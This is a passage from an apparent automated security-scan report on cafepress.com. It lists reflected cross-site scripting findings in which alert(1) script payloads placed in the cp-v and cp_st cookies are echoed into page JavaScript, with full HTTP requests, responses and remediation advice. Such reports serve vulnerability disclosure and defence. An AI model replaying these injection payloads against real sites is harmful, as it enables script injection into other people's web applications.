__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA48b1e"-alert(1)-"48ef400b324; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; 
__utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW19
Cteonnt-Length: 59192
Date: Sun, 26 Dec 2010 13:48:47 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:47 GMT; path=/
Set-Cookie: cp_sc=100214; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:47 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59192

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";

   
   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA48b1e"-alert(1)-"48ef400b324";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {
       
       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.49. http://www.cafepress.com/+magnets [cp_st cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /+magnets

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1a93</script><script>alert(1)</script>a21dc3c1ba6 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /+magnets HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=f1a93</script><script>alert(1)</script>a21dc3c1ba6; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; 
tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW13
Cteonnt-Length: 59206
Date: Sun, 26 Dec 2010 13:48:45 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:44 GMT; path=/
Set-Cookie: cp_sc=100214; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:44 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59206

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
= 'cafepress.com';


window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'SearchResults'
window.cafepress.tealeaf.searchTerm = 'f1a93</script><script>alert(1)</script>a21dc3c1ba6'
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'SEO'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C
...[SNIP]...

1.50. http://www.cafepress.com/+mousepads [cp-v cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /+mousepads

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2de4"-alert(1)-"8af102be85f was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /+mousepads HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BAe2de4"-alert(1)-"8af102be85f; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; 
__utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW19
Cteonnt-Length: 56880
Date: Sun, 26 Dec 2010 13:48:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:57 GMT; path=/
Set-Cookie: cp_sc=200051; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:57 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 56880

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";

   
   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAe2de4"-alert(1)-"8af102be85f";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {
       
       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.51. http://www.cafepress.com/+mousepads [cp_st cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /+mousepads

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a6760</script><script>alert(1)</script>1c00c257e15 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /+mousepads HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=a6760</script><script>alert(1)</script>1c00c257e15; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; 
tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW22
Cteonnt-Length: 56907
Date: Sun, 26 Dec 2010 13:48:54 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:54 GMT; path=/
Set-Cookie: cp_sc=200051; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:54 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 56907

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
= 'cafepress.com';


window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'SearchResults'
window.cafepress.tealeaf.searchTerm = 'a6760</script><script>alert(1)</script>1c00c257e15'
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'SEO'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C
...[SNIP]...

1.52. http://www.cafepress.com/+mugs [cp-v cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /+mugs

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49177"-alert(1)-"acf862ea6e2 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /+mugs HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA49177"-alert(1)-"acf862ea6e2; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; 
__utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW18
Cteonnt-Length: 60103
Date: Sun, 26 Dec 2010 13:47:33 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:33 GMT; path=/
Set-Cookie: cp_sc=100139; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:33 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 60103

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";

   
   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA49177"-alert(1)-"acf862ea6e2";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {
       
       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.53. http://www.cafepress.com/+mugs [cp_st cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /+mugs

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6774f</script><script>alert(1)</script>147c0c0a55c was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /+mugs HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=6774f</script><script>alert(1)</script>147c0c0a55c; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; 
tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW16
Cteonnt-Length: 60125
Date: Sun, 26 Dec 2010 13:47:32 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:31 GMT; path=/
Set-Cookie: cp_sc=100139; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:31 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 60125

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
= 'cafepress.com';


window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'SearchResults'
window.cafepress.tealeaf.searchTerm = '6774f</script><script>alert(1)</script>147c0c0a55c'
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'SEO'
